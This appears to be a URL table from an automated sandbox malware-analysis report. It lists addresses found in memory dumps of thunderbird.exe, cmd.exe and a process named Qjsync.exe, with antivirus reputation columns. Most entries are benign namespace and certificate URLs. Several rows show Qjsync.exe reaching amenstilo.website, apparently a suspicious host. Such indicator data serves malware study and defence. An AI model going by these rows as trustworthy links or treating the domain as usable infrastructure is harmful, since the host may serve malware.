http://home.netscape.com/NC-rdf#persist	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#extension	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.mozilla.com0	thunderbird.exe, 00000003.00000003.2260894204.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2261061954.00000000030F2000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2260778595.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2260293637.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2261175868.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2261421950.00000000030F3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://home.netscape.com/NC-rdf#DownloadFlaggedMessageshttp://home.netscape.com/NC-rdf#MarkAllMessag	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#PageTitleSMTP	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#IsDefaultServer	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Name	thunderbird.exe, 00000003.00000000.2157387676.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000002.2265907816.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422053504.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 00000004.00000000.2264998522.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#value	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Modify	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#alwaysAsk	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/anyTypeFailure	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false		high
http://home.netscape.com/NC-rdf#IconURL	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#SpecialFolder	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#CanGetIncomingMessages	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#IsWriteable	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Junk	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Synchronize	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Enabledfilter;filterName=filterName=MsgBiffinserting	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0	cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3012310782.00000001401F4000.00000002.00000001.01000000.00000027.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	false		high
http://home.netscape.com/NC-rdf#EmptyTrash	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://www.softwareok.de	thunderbird.exe, 00000003.00000002.2266985552.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000000.2594143900.00000001401E0000.00000002.00000001.01000000.00000027.sdmp	false		high
https://amenstilo.website:443/courtney_ryley_cooper_biography.html?jobjbyy11iib4wpr=h3593GdmUsLiBsC%	Qjsync.exe, 0000000C.00000002.2990103682.0000000000497000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#	thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://www.softwareok.de/?Freeware/Find.Same.Images.OK/History	cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3012310782.00000001401F4000.00000002.00000001.01000000.00000027.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	false		high
http://home.netscape.com/NC-rdf#DeleteCardshttp://home.netscape.com/NC-rdf#DirTreeNameSorthttp://hom	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://www.softwareok.com/?Download=Find.Same.Images.OK	cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3012310782.00000001401F4000.00000002.00000001.01000000.00000027.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	false		high
http://home.netscape.com/NC-rdf#IEFavoriteFolder	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawtePremiumServerCA.crl0	thunderbird.exe, 00000003.00000003.2260894204.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2261061954.00000000030F2000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2260778595.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2260293637.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2261175868.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2261421950.00000000030F3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://home.netscape.com/NC-rdf#SupportsFilters	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
https://amenstilo.website/Q-	Qjsync.exe, 0000000C.00000002.2990103682.000000000047C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://amenstilo.website:443	Qjsync.exe, 0000000C.00000003.2923611263.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2967722836.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990394887.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2989853396.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2943182905.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2821255012.00000000004FD000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2903508032.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2943745386.00000000004F4000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2884218408.00000000004FA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#CanSubscribe	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#DeleteCards	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#NoSelect	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#PageTitleFakeAccount	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#CanCompact	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false		high
http://home.netscape.com/NC-rdf#CanCreateSubfolders	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://www.softwareok.de/?Download=Find.Same.Images.OK	cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3012310782.00000001401F4000.00000002.00000001.01000000.00000027.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	false		high
http://home.netscape.com/NC-rdf#ImapShared	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#FolderTreeSimpleName	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#handleInternal	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#InVFEditSearchScope	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#TotalUnreadMessages	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Server	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#IsDeferred	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/cps0(	thunderbird.exe, 00000003.00000002.2266985552.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Qjsync.exe, 0000000C.00000002.3011558099.0000000007FDF000.00000004.00001000.00020000.00000000.sdmp	false		high
http://home.netscape.com/NC-rdf#Namehttp://home.netscape.com/NC-rdf#Checkedhttp://home.netscape.com/	thunderbird.exe, 00000003.00000000.2157387676.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000002.2265907816.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422053504.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp, thunderbird.exe, 00000004.00000000.2264998522.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#MarkAllMessagesRead	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#description	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#attribute	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Move	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
https://amenstilo.website/N	Qjsync.exe, 0000000C.00000002.2990103682.0000000000449000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#CompactAll	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#Content-Length	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#IsSessionDefaultServerNC:smtpservershttp://home.netscape.com/NC-rdf#	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#NewFolder	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/rpa00	thunderbird.exe, 00000003.00000002.2266985552.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	false		high
http://home.netscape.com/NC-rdf#CopyFolder	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
https://amenstilo.website/A-$	Qjsync.exe, 0000000C.00000002.2990103682.000000000047C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://amenstilo.website/(O	Qjsync.exe, 0000000C.00000003.2800043144.00000000004E2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.info-zip.org/	thunderbird.exe, 00000003.00000002.2266985552.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C09000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.0000000005133000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.0000000002713000.00000004.00000001.00020000.00000000.sdmp	false		high
http://home.netscape.com/NC-rdf#SyncDisabled	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#HasUnreadMessages	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#IsMailList	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#PageTitleDiskSpace	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
https://amenstilo.website/J	Qjsync.exe, 0000000C.00000002.2990103682.0000000000449000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#DirName	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#SubfoldersHaveUnreadMessages	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
http://home.netscape.com/NC-rdf#DirTreeNameSort	thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	false	Avira URL Cloud: safe	unknown
